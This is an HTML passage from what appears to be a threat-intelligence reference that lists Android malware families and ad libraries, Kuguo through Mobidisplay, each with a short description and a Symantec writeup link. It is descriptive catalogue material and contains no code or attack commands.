<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 224. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040109-2415-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040109-2415-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kuguo"><a class="anchor" href="#_kuguo"></a><a class="link" href="#_kuguo">Kuguo</a></h3>
<div class="paragraph">
<p>Kuguo is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 225. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040315-5215-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040315-5215-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lastacloud"><a class="anchor" href="#_lastacloud"></a><a class="link" href="#_lastacloud">Lastacloud</a></h3>
<div class="paragraph">
<p>Lastacloud is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 226. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-121216-4334-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-121216-4334-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_laucassspy"><a class="anchor" href="#_laucassspy"></a><a class="link" href="#_laucassspy">Laucassspy</a></h3>
<div class="paragraph">
<p>Laucassspy is a spyware program for Android devices that steals information and sends it to a remote location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 227. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-092409-1822-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-092409-1822-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lifemonspy"><a class="anchor" href="#_lifemonspy"></a><a class="link" href="#_lifemonspy">Lifemonspy</a></h3>
<div class="paragraph">
<p>Lifemonspy is a spyware application for Android devices that can track the phone&#8217;s location, download SMS messages, and erase certain data from the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 228. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-111516-5540-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-111516-5540-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lightdd"><a class="anchor" href="#_lightdd"></a><a class="link" href="#_lightdd">Lightdd</a></h3>
<div class="paragraph">
<p>Lightdd is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 229. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-053114-2342-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-053114-2342-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_loaderpush"><a class="anchor" href="#_loaderpush"></a><a class="link" href="#_loaderpush">Loaderpush</a></h3>
<div class="paragraph">
<p>Loaderpush is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 230. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040108-0244-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040108-0244-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_locaspy"><a class="anchor" href="#_locaspy"></a><a class="link" href="#_locaspy">Locaspy</a></h3>
<div class="paragraph">
<p>Locaspy is a Potentially Unwanted Application for Android devices that tracks the location of the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 231. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-030720-3500-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-030720-3500-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lockdroid_e"><a class="anchor" href="#_lockdroid_e"></a><a class="link" href="#_lockdroid_e">Lockdroid.E</a></h3>
<div class="paragraph">
<p>Lockdroid.E is a Trojan horse for Android devices that locks the screen and displays a ransom demand on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 232. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-103005-2209-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-103005-2209-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lockdroid_f"><a class="anchor" href="#_lockdroid_f"></a><a class="link" href="#_lockdroid_f">Lockdroid.F</a></h3>
<div class="paragraph">
<p>Lockdroid.F is a Trojan horse for Android devices that locks the screen and displays a ransom demand on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 233. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-102215-4346-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-102215-4346-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lockdroid_g"><a class="anchor" href="#_lockdroid_g"></a><a class="link" href="#_lockdroid_g">Lockdroid.G</a></h3>
<div class="paragraph">
<p>Lockdroid.G is a Trojan horse for Android devices that may display a ransom demand on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 234. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-050610-2450-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-050610-2450-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lockdroid_h"><a class="anchor" href="#_lockdroid_h"></a><a class="link" href="#_lockdroid_h">Lockdroid.H</a></h3>
<div class="paragraph">
<p>Lockdroid.H is a Trojan horse for Android devices that locks the screen and displays a ransom demand on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 235. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2016-031621-1349-99">https://www.symantec.com/security_response/writeup.jsp?docid=2016-031621-1349-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lockscreen"><a class="anchor" href="#_lockscreen"></a><a class="link" href="#_lockscreen">Lockscreen</a></h3>
<div class="paragraph">
<p>Lockscreen is a Trojan horse for Android devices that locks the compromised device from use.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 236. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-032409-0743-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-032409-0743-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_logiaad"><a class="anchor" href="#_logiaad"></a><a class="link" href="#_logiaad">LogiaAd</a></h3>
<div class="paragraph">
<p>LogiaAd is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 237. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052713-0348-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052713-0348-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_loicdos"><a class="anchor" href="#_loicdos"></a><a class="link" href="#_loicdos">Loicdos</a></h3>
<div class="paragraph">
<p>Loicdos is an Android application that provides an interface to a website in order to perform a denial of service (DoS) attack against a computer.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 238. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-022002-2431-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-022002-2431-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_loozfon"><a class="anchor" href="#_loozfon"></a><a class="link" href="#_loozfon">Loozfon</a></h3>
<div class="paragraph">
<p>Loozfon is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 239. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-082005-5451-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-082005-5451-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lotoor"><a class="anchor" href="#_lotoor"></a><a class="link" href="#_lotoor">Lotoor</a></h3>
<div class="paragraph">
<p>Lotoor is a generic detection for hack tools that exploit vulnerabilities in order to gain root privileges on compromised Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 240. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-091922-4449-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-091922-4449-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lovespy"><a class="anchor" href="#_lovespy"></a><a class="link" href="#_lovespy">Lovespy</a></h3>
<div class="paragraph">
<p>Lovespy is a Trojan horse for Android devices that steals information from the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 241. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-071814-3805-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-071814-3805-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lovetrap"><a class="anchor" href="#_lovetrap"></a><a class="link" href="#_lovetrap">Lovetrap</a></h3>
<div class="paragraph">
<p>Lovetrap is a Trojan horse that sends SMS messages to premium-rate phone numbers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 242. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-072806-2905-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-072806-2905-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_luckycat"><a class="anchor" href="#_luckycat"></a><a class="link" href="#_luckycat">Luckycat</a></h3>
<div class="paragraph">
<p>Luckycat is a Trojan horse for Android devices that opens a back door and steals information on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 243. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-080617-5343-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-080617-5343-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_machinleak"><a class="anchor" href="#_machinleak"></a><a class="link" href="#_machinleak">Machinleak</a></h3>
<div class="paragraph">
<p>Machinleak is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 244. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-120311-2440-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-120311-2440-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_maistealer"><a class="anchor" href="#_maistealer"></a><a class="link" href="#_maistealer">Maistealer</a></h3>
<div class="paragraph">
<p>Maistealer is a Trojan that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 245. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-072411-4350-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-072411-4350-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_malapp"><a class="anchor" href="#_malapp"></a><a class="link" href="#_malapp">Malapp</a></h3>
<div class="paragraph">
<p>Malapp is a generic detection for many individual but varied threats on Android devices that share similar characteristics.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 246. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-073014-3354-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-073014-3354-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_malebook"><a class="anchor" href="#_malebook"></a><a class="link" href="#_malebook">Malebook</a></h3>
<div class="paragraph">
<p>Malebook is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 247. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-071206-3403-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-071206-3403-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_malhome"><a class="anchor" href="#_malhome"></a><a class="link" href="#_malhome">Malhome</a></h3>
<div class="paragraph">
<p>Malhome is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 248. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-071118-0441-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-071118-0441-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_malminer"><a class="anchor" href="#_malminer"></a><a class="link" href="#_malminer">Malminer</a></h3>
<div class="paragraph">
<p>Malminer is a Trojan horse for Android devices that mines cryptocurrencies on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 249. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-032712-3709-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-032712-3709-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mania"><a class="anchor" href="#_mania"></a><a class="link" href="#_mania">Mania</a></h3>
<div class="paragraph">
<p>Mania is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 250. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-070623-1520-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-070623-1520-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_maxit"><a class="anchor" href="#_maxit"></a><a class="link" href="#_maxit">Maxit</a></h3>
<div class="paragraph">
<p>Maxit is a Trojan horse for Android devices that opens a back door on the compromised device. It also steals certain information and uploads it to a remote location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 251. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-120411-2511-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-120411-2511-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mdotm"><a class="anchor" href="#_mdotm"></a><a class="link" href="#_mdotm">MdotM</a></h3>
<div class="paragraph">
<p>MdotM is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 252. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-5824-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-5824-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_medialets"><a class="anchor" href="#_medialets"></a><a class="link" href="#_medialets">Medialets</a></h3>
<div class="paragraph">
<p>Medialets is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 253. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-5222-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-5222-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_meshidden"><a class="anchor" href="#_meshidden"></a><a class="link" href="#_meshidden">Meshidden</a></h3>
<div class="paragraph">
<p>Meshidden is a spyware application for Android devices that allows the device it is installed on to be monitored.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 254. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-031913-5257-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-031913-5257-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mesploit"><a class="anchor" href="#_mesploit"></a><a class="link" href="#_mesploit">Mesploit</a></h3>
<div class="paragraph">
<p>Mesploit is a tool for Android devices used to create applications that exploit the Android Fake ID vulnerability.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 255. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-032014-2847-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-032014-2847-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mesprank"><a class="anchor" href="#_mesprank"></a><a class="link" href="#_mesprank">Mesprank</a></h3>
<div class="paragraph">
<p>Mesprank is a Trojan horse for Android devices that opens a back door on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 256. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-030717-1933-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-030717-1933-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_meswatcherbox"><a class="anchor" href="#_meswatcherbox"></a><a class="link" href="#_meswatcherbox">Meswatcherbox</a></h3>
<div class="paragraph">
<p>Meswatcherbox is a spyware application for Android devices that forwards SMS messages without the user knowing.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 257. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-111612-2736-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-111612-2736-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_miji"><a class="anchor" href="#_miji"></a><a class="link" href="#_miji">Miji</a></h3>
<div class="paragraph">
<p>Miji is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 258. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-4720-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-4720-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_milipnot"><a class="anchor" href="#_milipnot"></a><a class="link" href="#_milipnot">Milipnot</a></h3>
<div class="paragraph">
<p>Milipnot is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 259. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-070414-0941-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-070414-0941-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_millennialmedia"><a class="anchor" href="#_millennialmedia"></a><a class="link" href="#_millennialmedia">MillennialMedia</a></h3>
<div class="paragraph">
<p>MillennialMedia is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 260. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-4602-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-4602-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mitcad"><a class="anchor" href="#_mitcad"></a><a class="link" href="#_mitcad">Mitcad</a></h3>
<div class="paragraph">
<p>Mitcad is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 261. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040212-0528-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040212-0528-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mobclix"><a class="anchor" href="#_mobclix"></a><a class="link" href="#_mobclix">MobClix</a></h3>
<div class="paragraph">
<p>MobClix is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 262. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-4011-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-4011-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mobfox"><a class="anchor" href="#_mobfox"></a><a class="link" href="#_mobfox">MobFox</a></h3>
<div class="paragraph">
<p>MobFox is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 263. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-3050-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-3050-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mobidisplay"><a class="anchor" href="#_mobidisplay"></a><a class="link" href="#_mobidisplay">Mobidisplay</a></h3>
<div class="paragraph">
<p>Mobidisplay is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 264. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
